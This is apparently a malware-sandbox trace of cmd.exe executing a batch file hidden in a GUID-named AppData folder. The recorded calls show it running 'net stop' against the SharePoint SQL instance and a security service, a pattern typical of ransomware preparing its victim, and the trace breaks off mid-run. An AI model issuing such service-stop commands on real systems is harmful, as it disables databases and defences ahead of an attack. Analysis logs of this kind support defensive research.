1 [0215.192] GetProcessHeap () returned 0x3e0000 [0215.192] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.192] GetEnvironmentStringsW () returned 0x3f8408* [0215.192] GetProcessHeap () returned 0x3e0000 [0215.192] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.192] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.192] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0215.193] GetProcessHeap () returned 0x3e0000 [0215.193] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.193] GetEnvironmentStringsW () returned 0x3f8408* [0215.193] GetProcessHeap () returned 0x3e0000 [0215.193] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.193] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.193] GetProcessHeap () returned 0x3e0000 [0215.193] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0215.193] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0215.193] _get_osfhandle (_FileHandle=1) returned 0x264 [0215.193] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0215.193] _get_osfhandle (_FileHandle=1) returned 0x264 [0215.193] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0215.193] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0215.193] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0215.194] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0215.194] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0215.194] SetConsoleInputExeNameW () returned 0x1 [0215.194] GetConsoleOutputCP () returned 0x1b5 [0215.194] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0215.194] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.194] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0215.194] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0215.194] _get_osfhandle (_FileHandle=3) returned 0x74 [0215.194] SetFilePointer (in: hFile=0x74, lDistanceToMove=5591, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15d7 [0215.194] GetProcessHeap () returned 0x3e0000 [0215.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0215.195] GetProcessHeap () returned 0x3e0000 [0215.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0215.195] GetProcessHeap () returned 0x3e0000 [0215.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0215.195] GetProcessHeap () returned 0x3e0000 [0215.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0215.195] GetProcessHeap () returned 0x3e0000 [0215.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0215.195] GetProcessHeap () returned 0x3e0000 [0215.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0215.195] GetProcessHeap () returned 0x3e0000 [0215.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0215.195] GetProcessHeap () returned 0x3e0000 [0215.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0215.195] GetProcessHeap () returned 0x3e0000 [0215.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0215.195] GetProcessHeap () returned 0x3e0000 [0215.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0215.195] GetProcessHeap () returned 0x3e0000 [0215.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0215.195] GetProcessHeap () returned 0x3e0000 [0215.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0215.195] GetProcessHeap () returned 0x3e0000 [0215.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0215.195] _get_osfhandle (_FileHandle=3) returned 0x74 [0215.195] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15d7 [0215.195] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x2ea, lpOverlapped=0x0) returned 1 [0215.195] SetFilePointer (in: hFile=0x74, lDistanceToMove=5621, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15f5 [0215.195] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=30, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$SHAREPOINT /y\r\n\n/y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 30 [0215.196] _get_osfhandle (_FileHandle=3) returned 0x74 [0215.196] GetFileType (hFile=0x74) returned 0x1 [0215.196] _get_osfhandle (_FileHandle=3) returned 0x74 [0215.196] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15f5 [0215.196] GetProcessHeap () returned 0x3e0000 [0215.196] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0215.196] GetProcessHeap () returned 0x3e0000 [0215.196] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0215.199] _tell (_FileHandle=3) returned 5621 [0215.199] _close (_FileHandle=3) returned 0 [0215.200] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0215.200] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0215.200] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0215.200] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0215.200] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0215.200] _wcsicmp (_String1="net", _String2="CD") returned 11 [0215.200] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0215.200] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0215.200] _wcsicmp (_String1="net", _String2="REN") returned -4 [0215.200] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0215.200] _wcsicmp (_String1="net", _String2="SET") returned -5 [0215.200] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0215.200] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0215.200] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0215.200] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0215.200] _wcsicmp (_String1="net", _String2="MD") returned 1 [0215.200] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0215.200] _wcsicmp (_String1="net", _String2="RD") returned -4 [0215.200] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0215.200] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0215.200] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0215.200] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0215.200] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0215.200] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0215.200] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0215.200] _wcsicmp (_String1="net", _String2="VER") returned -8 [0215.200] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0215.200] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0215.200] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0215.200] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0215.200] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0215.200] _wcsicmp (_String1="net", _String2="START") returned -5 [0215.200] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0215.200] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0215.200] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0215.200] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0215.200] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0215.201] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0215.201] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0215.201] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0215.201] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0215.201] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0215.201] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0215.201] SetErrorMode (uMode=0x0) returned 0x1 [0215.201] GetProcessHeap () returned 0x3e0000 [0215.201] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0215.201] GetProcessHeap () returned 0x3e0000 [0215.201] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0215.202] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.202] GetProcessHeap () returned 0x3e0000 [0215.202] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0215.202] GetProcessHeap () returned 0x3e0000 [0215.202] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0215.202] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0215.202] GetProcessHeap () returned 0x3e0000 [0215.202] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0215.202] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.202] GetProcessHeap () returned 0x3e0000 [0215.202] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0215.203] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0215.203] GetProcessHeap () returned 0x3e0000 [0215.203] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0215.203] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.203] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.203] GetLastError () returned 0x2 [0215.204] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.204] GetLastError () returned 0x2 [0215.204] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0215.205] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.206] GetLastError () returned 0x2 [0215.206] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0215.206] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.206] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.207] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0215.207] SetErrorMode (uMode=0x0) returned 0x1 [0215.207] GetProcessHeap () returned 0x3e0000 [0215.207] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0215.207] GetProcessHeap () returned 0x3e0000 [0215.207] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0215.208] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.208] GetProcessHeap () returned 0x3e0000 [0215.208] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0215.208] GetProcessHeap () returned 0x3e0000 [0215.208] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0215.208] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0215.208] GetProcessHeap () returned 0x3e0000 [0215.208] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0215.208] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.208] GetProcessHeap () returned 0x3e0000 [0215.208] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0215.209] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0215.209] GetProcessHeap () returned 0x3e0000 [0215.209] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0215.209] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.209] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.210] GetLastError () returned 0x2 [0215.210] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.210] GetLastError () returned 0x2 [0215.210] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.211] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0215.211] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0215.211] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.212] GetLastError () returned 0x2 [0215.212] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0215.212] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0215.212] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.213] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0215.213] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0215.213] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0215.213] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0215.213] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$SHAREPOINT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$SHAREPOINT /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$SHAREPOINT /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x688, dwThreadId=0x130)) returned 1 [0215.229] CloseHandle (hObject=0x74) returned 1 [0215.229] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0215.229] GetProcessHeap () returned 0x3e0000 [0215.229] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.229] GetEnvironmentStringsW () returned 0x3f8408* [0215.229] GetProcessHeap () returned 0x3e0000 [0215.229] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.229] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.229] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0215.369] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0215.371] CloseHandle (hObject=0x78) returned 1 [0215.371] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0215.371] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0215.371] GetProcessHeap () returned 0x3e0000 [0215.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.371] GetEnvironmentStringsW () returned 0x3f8408* [0215.371] GetProcessHeap () returned 0x3e0000 [0215.371] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.372] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.372] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0215.372] GetProcessHeap () returned 0x3e0000 [0215.372] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.372] GetEnvironmentStringsW () returned 0x3f8408* [0215.372] GetProcessHeap () returned 0x3e0000 [0215.372] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.372] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.372] GetProcessHeap () returned 0x3e0000 [0215.372] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0215.372] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0215.373] _get_osfhandle (_FileHandle=1) returned 0x264 [0215.373] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0215.373] _get_osfhandle (_FileHandle=1) returned 0x264 [0215.373] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0215.373] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0215.373] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0215.373] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0215.373] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0215.373] SetConsoleInputExeNameW () returned 0x1 [0215.373] GetConsoleOutputCP () returned 0x1b5 [0215.374] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0215.374] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.374] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0215.374] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0215.374] _get_osfhandle (_FileHandle=3) returned 0x78 [0215.374] SetFilePointer (in: hFile=0x78, lDistanceToMove=5621, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15f5 [0215.374] GetProcessHeap () returned 0x3e0000 [0215.374] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0215.374] GetProcessHeap () returned 0x3e0000 [0215.374] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0215.374] GetProcessHeap () returned 0x3e0000 [0215.374] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0215.374] GetProcessHeap () returned 0x3e0000 [0215.374] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0215.374] GetProcessHeap () returned 0x3e0000 [0215.374] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0215.374] GetProcessHeap () returned 0x3e0000 [0215.374] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0215.374] GetProcessHeap () returned 0x3e0000 [0215.374] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0215.374] GetProcessHeap () returned 0x3e0000 [0215.374] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0215.374] GetProcessHeap () returned 0x3e0000 [0215.374] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0215.374] GetProcessHeap () returned 0x3e0000 [0215.374] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0215.374] GetProcessHeap () returned 0x3e0000 [0215.374] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0215.375] GetProcessHeap () returned 0x3e0000 [0215.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0215.375] GetProcessHeap () returned 0x3e0000 [0215.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0215.375] _get_osfhandle (_FileHandle=3) returned 0x78 [0215.375] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15f5 [0215.375] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x2cc, lpOverlapped=0x0) returned 1 [0215.375] SetFilePointer (in: hFile=0x78, lDistanceToMove=5640, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1608 [0215.376] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=19, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop WRSVC /y\r\nEPOINT /y\r\n\n/y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 19 [0215.376] _get_osfhandle (_FileHandle=3) returned 0x78 [0215.376] GetFileType (hFile=0x78) returned 0x1 [0215.376] _get_osfhandle (_FileHandle=3) returned 0x78 [0215.376] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1608 [0215.376] GetProcessHeap () returned 0x3e0000 [0215.376] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0215.376] GetProcessHeap () returned 0x3e0000 [0215.376] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0215.380] _tell (_FileHandle=3) returned 5640 [0215.380] _close (_FileHandle=3) returned 0 [0215.380] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0215.380] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0215.380] _wcsicmp 